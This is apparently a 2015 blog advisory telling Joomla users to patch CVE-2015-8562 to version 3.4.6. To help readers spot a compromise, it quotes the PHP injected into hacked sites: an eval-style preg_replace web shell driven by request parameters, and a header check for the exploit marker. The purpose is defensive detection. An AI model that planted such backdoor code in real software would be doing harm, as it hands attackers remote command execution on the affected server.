Very Important: Update to Joomla 3.4.6 Immediately!

There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla

If you are using Joomla 3, please update immediately to Joomla 3.4.6.

Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.

How to Check

I have quite a number of friends who are being hit by this.

Some signs of being attacked are as follows. Take at look at your <Joomla_Root_Folder>/index.php OR <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site is being hit.

1. The following from <Joomla_Root_Folder>/index.php:

<?php

if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}

if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}

if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}


/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

2. The following from <Joomla_Root_Folder>/includes/framework.php:

<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_
FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

How to Update

Please apply the following patch immediately:

• Joomla 3 and above: Joomla 3.4.6.

Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.

• Old (unsupported) versions 1.5.x and 2.5.x: You may apply the security hotfixes here. This article from OSTraining explains how to apply them.

Related Articles

• Vulnerability Details: Joomla! Remote Code Execution

• CVE-2015-8562 - Joomla 1.5.0 - 3.4.5 - Remote Code Execution

• [20151201] - Core - Remote Code Execution Vulnerability